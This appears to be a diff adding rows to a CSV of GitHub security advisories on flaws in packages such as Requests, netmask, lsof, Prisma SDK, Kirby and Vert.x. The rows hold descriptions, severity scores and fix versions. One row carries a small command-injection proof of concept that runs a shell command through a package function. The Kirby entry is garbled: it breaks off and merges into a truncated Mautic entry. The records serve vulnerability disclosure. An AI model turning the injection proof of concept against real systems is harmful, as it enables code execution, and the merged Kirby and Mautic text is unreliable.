+* Open an issue in [Request](https://github.com/WordPress/Requests/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'rmccue/requests'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/WordPress/Requests/security/advisories/GHSA-52qp-jpq7-6c54'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29476'}, {'type': 'WEB', 'url': 'https://github.com/ambionics/phpggc/issues/52'}, {'type': 'WEB', 'url': 'https://github.com/rmccue/Requests/pull/421'}, {'type': 'WEB', 'url': 'https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3'}, {'type': 'WEB', 'url': 'https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf'}, {'type': 'WEB', 'url': 'https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/'}, {'type': 'WEB', 'url': 'https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf'}, {'type': 'WEB', 'url': 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/rmccue/requests/CVE-2021-29476.yaml'}, {'type': 'WEB', 'url': 'https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf'}, {'type': 'WEB', 'url': 'https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f'}, {'type': 'WEB', 'url': 'https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T20:54:56Z', 'nvd_published_at': '2021-04-27T21:15:00Z'}"
+1.4.0,GHSA-4c7m-wxvm-r7gc,2022-04-01T20:21:55Z,2021-04-14T15:03:16Z,,['CVE-2021-28918'],Improper parsing of octal bytes in netmask,"Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
+
+:exclamation: NOTE: The fix for this issue was incomplete. A subsequent fix was made in version `2.0.1` which was assigned [CVE-2021-29418 / GHSA-pch5-whg9-qr2r](https://github.com/advisories/GHSA-pch5-whg9-qr2r). For complete protection from this vulnerability an upgrade to version 2.0.1 or later is recommended.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'netmask'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28918'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pch5-whg9-qr2r'}, {'type': 'PACKAGE', 'url': 'https://github.com/rs/node-netmask/'}, {'type': 'WEB', 'url': 'https://github.com/rs/node-netmask/blob/98294cb20695f2c6c36219a4fbcd4744fb8d0682/CHANGELOG.md#v110-mar-18-2021'}, {'type': 'WEB', 'url': 'https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md'}, {'type': 'WEB', 'url': 'https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0010/'}, {'type': 'WEB', 'url': 'https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/netmask'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T16:13:23Z', 'nvd_published_at': '2021-04-01T13:15:00Z'}"
+1.4.0,GHSA-whq6-mj2r-mjqc,2021-03-29T22:11:57Z,2021-04-13T15:17:53Z,,['CVE-2019-10783'],OS Command Injection in lsof,All versions including 0.0.4 of lsof npm module are vulnerable to Command Injection. Every exported method used by the package uses the exec function to parse user input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'lsof'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10783'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LSOF-543632'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:11:57Z', 'nvd_published_at': '2020-01-29T22:15:00Z'}"
+1.4.0,GHSA-hh8v-jmh3-9437,2021-04-06T21:51:28Z,2021-04-13T15:25:33Z,,['CVE-2020-8823'],Cross-site scripting in SocksJS-node,htmlfile in lib/transport/htmlfile.js in SockJS before 0.3.0 is vulnerable to Reflected XSS via the /htmlfile c (aka callback) parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sockjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8823'}, {'type': 'WEB', 'url': 'https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/theyiyibest/Reflected-XSS-on-SockJS'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SOCKJS-548397'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/sockjs'}, {'type': 'WEB', 'url': 'https://www.sockjs.org'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:51:28Z', 'nvd_published_at': '2020-02-10T03:15:00Z'}"
+1.4.0,GHSA-5wrh-4jwv-5w78,2021-08-31T21:07:35Z,2021-04-13T15:13:08Z,,['CVE-2021-21392'],Open redirect via transitional IPv6 addresses on dual-stack networks,"### Impact
+Requests to user provided domains were not restricted to external IP addresses when transitional IPv6 addresses were used. Outbound requests to federation, identity servers, when calculating the key validity for third-party invite events, sending push notifications, and generating URL previews are affected. This could cause Synapse to make requests to internal infrastructure on dual-stack networks.
+
+### Patches
+This issue is fixed by #9240.
+
+### Workarounds
+Outbound requests to the following address ranges can be blocked by a firewall, if unused for internal communication between systems:
+
+* `::ffff/80`
+* `::0000/80` (note that this IP range is considered deprecated by the IETF)
+* `2002::/16` (note that this IP range is considered deprecated by the IETF)
+
+### References
+* [RFC3056](https://tools.ietf.org/html/rfc3056)
+* [RFC4291](https://tools.ietf.org/html/rfc4291)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-5wrh-4jwv-5w78'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21392'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9240'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T21:51:49Z', 'nvd_published_at': '2021-04-12T22:15:00Z'}"
+1.4.0,GHSA-rp4x-wxqv-cf9m,2021-04-16T23:17:25Z,2021-04-19T14:52:29Z,,['CVE-2019-25027'],Reflected cross-site scripting in default RouteNotFoundError view in Vaadin 10 and 11-13,"Missing output sanitization in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.10 (Vaadin 10.0.0 through 10.0.13), and 1.1.0 through 1.4.2 (Vaadin 11.0.0 through 13.0.5) allows attacker to execute malicious JavaScript via crafted URL.
+
+- https://vaadin.com/security/cve-2019-25027","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-rp4x-wxqv-cf9m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25027'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/5498'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2019-25027'}]","{'cwe_ids': ['CWE-79', 'CWE-81'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:17:25Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-g4cp-h53p-v3v8,2022-02-11T21:12:32Z,2021-04-30T17:28:42Z,,['CVE-2020-10705'],Allocation of Resources Without Limits or Throttling in Undertow,"A flaw was discovered in Undertow in versions before Undertow 2.1.1.Final where certain requests to the ""Expect: 100-continue"" header may cause an out of memory error. This flaw may potentially lead to a denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10705'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1803241'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0014/'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:36:15Z', 'nvd_published_at': '2020-06-10T20:15:00Z'}"
+1.4.0,GHSA-gfr2-qpxh-qj9m,2022-05-05T21:55:25Z,2021-04-07T20:35:24Z,,['CVE-2020-1735'],Path Traversal in Ansible,"A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1735'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67793'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1735'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/blob/stable-2.9/changelogs/CHANGELOG-v2.9.rst#security-fixes-7'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T17:54:51Z', 'nvd_published_at': '2020-03-16T16:15:00Z'}"
+1.4.0,GHSA-pxcc-hj8w-fmm7,2021-03-31T18:00:32Z,2021-04-06T17:25:12Z,,['CVE-2021-21414'],Command injection vulnerability in @prisma/sdk in getPackedPackage function,"### Impact
+
+As of today, we are not aware of any Prisma users or external consumers of the `@prisma/sdk` package who are affected by this security vulnerability.
+
+This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
+
+It only affects the `getPackedPackage` function and this function is not advertised and only used for tests & building our CLI, no malicious code was found after checking our codebase.
+
+### Patches
+
+Fixed in
+- @prisma/sdk@2.20.0 (latest channel)
+- @prisma/sdk@2.20.0-dev.29 (dev channel)
+
+Pull Request closing this vulnerability [https://github.com/prisma/prisma/pull/6245](https://github.com/prisma/prisma/pull/6245)
+
+### Acknowledgements
+
+This issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh).
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+- Create a discussion in [the Prisma repository](https://github.com/prisma/prisma/discussions)
+- Email us at security@prisma.io","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@prisma/sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.20.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/prisma/prisma/security/advisories/GHSA-pxcc-hj8w-fmm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21414'}, {'type': 'WEB', 'url': 'https://github.com/prisma/prisma/pull/6245'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210618-0003/'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T18:00:32Z', 'nvd_published_at': '2021-04-29T01:15:00Z'}"
+1.4.0,GHSA-wmg4-8cp2-hpg9,2022-08-11T13:18:23Z,2021-04-19T14:54:04Z,,['CVE-2021-29430'],Sydent vulnerable to denial of service attack via memory exhaustion,"### Impact
+
+Sydent does not limit the size of requests it receives from HTTP clients. A malicious user could send an HTTP request with a very large body, leading to disk space exhaustion and denial of service.
+
+Sydent also does not limit response size for requests it makes to remote Matrix homeservers. A malicious homeserver could return a very large response, again leading to memory exhaustion and denial of service.
+
+This affects any server which accepts registration requests from untrusted clients.
+
+### Patches
+
+Patched by 89071a1, 0523511, f56eee3.
+
+### Workarounds
+
+Request sizes can be limited in an HTTP reverse-proxy.
+
+There are no known workarounds for the problem with overlarge responses.
+
+### For more information
+
+If you have any questions or comments about this advisory, email us at security@matrix.org.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-sydent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/security/advisories/GHSA-wmg4-8cp2-hpg9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29430'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/0523511d2fb40f2738f8a8549868f44b96e5dab7'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/89071a1a754c69a50deac89e6bb74002d4cda19d'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/f56eee315b6c44fdd9f6aa785cc2ec744a594428'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-sydent/'}]","{'cwe_ids': ['CWE-20', 'CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-15T20:49:34Z', 'nvd_published_at': '2021-04-15T21:15:00Z'}"
+1.4.0,GHSA-qgp4-5qx6-548g,2021-04-27T20:11:58Z,2021-04-30T17:30:06Z,,['CVE-2021-29460'],Cross-site scripting (XSS) from unsanitized uploaded SVG files in Kirby,"### Impact
+
+An editor with write access to the Kirby Panel can upload an SVG or XML file that contains harmful content like ``
+2. Visit any landing page and open the JS dev console. You will see the following message with real instance db password: `db password is: `
+
+Risk rating: ModerateCVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
+
+### Patches
+Upgrade to 3.3.2
+
+### Workarounds
+No
+
+### References
+No
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Email us at [security@mautic.org](mailto:security@mautic.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-4hjq-422q-4vpx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27908'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}]","{'cwe_ids': ['CWE-732', 'CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T16:38:12Z', 'nvd_published_at': '2021-03-23T20:15:00Z'}"
+1.4.0,GHSA-23c7-6444-399m,2022-10-25T20:51:03Z,2021-04-09T15:42:40Z,,['CVE-2021-21431'],Improper Input Validation in sopel-plugins.channelmgnt,"### Impact
+On some IRC servers, restrictions around the removal of the bot using the kick/kickban command could be bypassed when kicking multiple users at once.
+We also believe it may have been possible to remove users from other channels but due to the wonder that is IRC and following RfCs, We have no POC for that.
+
+Freenode is not affected.
+
+### Patches
+Upgrade to 2.0.1 or higher
+
+### Workarounds
+Do not use this plugin on networks where TARGMAX > 1.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue on [phab](https://phab.mirahezebots.org/maniphest/task/edit/form/1/).
+* Email us at [staff(at)mirahezebots(dot)org](mailto:staff@mirahezebots.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sopel-plugins.channelmgnt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-23c7-6444-399m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21431'}, {'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/commit/643388365f28c5cc682254ab913c401f0e53260a'}, {'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/commit/7c96d400358221e59135f0a0be0744f3fad73856'}, {'type': 'PACKAGE', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt'}, {'type': 'WEB', 'url': 'https://pypi.org/project/sopel-plugins.channelmgnt/'}]","{'cwe_ids': ['CWE-20', 'CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T15:42:18Z', 'nvd_published_at': '2021-04-09T16:15:00Z'}"
+1.4.0,GHSA-244r-fcj3-ghjq,2022-04-22T15:49:36Z,2021-04-07T21:51:33Z,,['CVE-2021-20289'],Exposure of class information in RESTEasy,A flaw was found in RESTEasy in all current versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method's parameter value. The highest threat from this vulnerability is to data confidentiality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '4.6.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20289'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1935927'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1941544'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/RESTEASY-2843'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0008/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-209', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T22:37:48Z', 'nvd_published_at': '2021-03-26T17:15:00Z'}"
+1.4.0,GHSA-27fj-mc8w-j9wg,2023-09-11T18:42:06Z,2021-04-16T19:52:35Z,,['CVE-2021-30246'],RSA signature validation vulnerability on maleable encoded message in jsrsasign,"### Impact
+Vulnerable jsrsasign will accept RSA signature with improper PKCS#1.5 padding.
+Decoded RSA signature value consists following form:
+`01(ff...(8 or more ffs)...ff)00[ASN.1 OF DigestInfo]`
+Its byte length must be the same as RSA key length, however such checking was not sufficient.
+
+To make crafted message for practical attack is very hard.
+
+### Patches
+Users validating RSA signature should upgrade to 10.2.0 or later.
+
+### Workarounds
+There is no workaround. Not to use RSA signature validation in jsrsasign.
+
+### ACKNOWLEDGEMENT
+Thanks to Daniel Yahyazadeh @yahyazadeh for reporting and analyzing this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsrsasign'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kjur/jsrsasign/security/advisories/GHSA-27fj-mc8w-j9wg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30246'}, {'type': 'WEB', 'url': 'https://github.com/kjur/jsrsasign/issues/478'}, {'type': 'WEB', 'url': 'https://github.com/kjur/jsrsasign/releases/tag/10.1.13'}, {'type': 'WEB', 'url': 'https://kjur.github.io/jsrsasign/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T17:30:34Z', 'nvd_published_at': '2021-04-07T21:15:00Z'}"
+1.4.0,GHSA-8695-fr6h-9fq8,2023-09-11T16:28:40Z,2021-04-13T15:19:23Z,2021-08-30T23:13:49Z,['CVE-2020-28430'],Command Injection in nuance-gulp-build-common,"All versions of package nuance-gulp-build-common are vulnerable to Command Injection via the index.js file.
+
+**PoC:**
+```js
+var a = require(""nuance-gulp-build-common"")
+a.run(""touch JHU"")
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nuance-gulp-build-common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28430'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NUANCEGULPBUILDCOMMON-1050419'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-25T23:50:03Z', 'nvd_published_at': '2021-02-23T16:15:00Z'}"
+1.4.0,GHSA-9q69-g5gc-9fgf,2021-04-20T17:07:06Z,2021-04-22T16:16:18Z,,['CVE-2020-35217'],Cross-Site Request Forgery in Vert.x-Web framework,"Vert.x-Web framework v4.0 milestone 1-4 does not perform a correct CSRF verification. Instead of comparing the CSRF token in the request with the CSRF token in the cookie, it compares the CSRF token in the cookie against a CSRF token that is stored in the session. An attacker does not even need to provide a CSRF token in the request because the framework does not consider it. The cookies are automatically sent by the browser and the verification will always succeed, leading to a successful CSRF attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone1'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone1']}, {'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone2'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone2']}, {'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone3'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone3']}, {'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone4'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone4']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35217'}, {'type': 'WEB', 'url': 'https://github.com/vert-x3/vertx-web/pull/1613'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:07:06Z', 'nvd_published_at': '2021-01-20T13:15:00Z'}"
+1.4.0,GHSA-72m5-fvvv-55m6,2021-04-20T16:59:30Z,2021-04-22T16:16:49Z,,['CVE-2020-26939'],Observable Differences in Behavior to Error Inputs in Bouncy Castle,"In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk14'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bc-fips'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26939'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commit/930f8b274c4f1f3a46e68b5441f1e7fadb57e8c1'}, {'type': 'WEB', 'url': 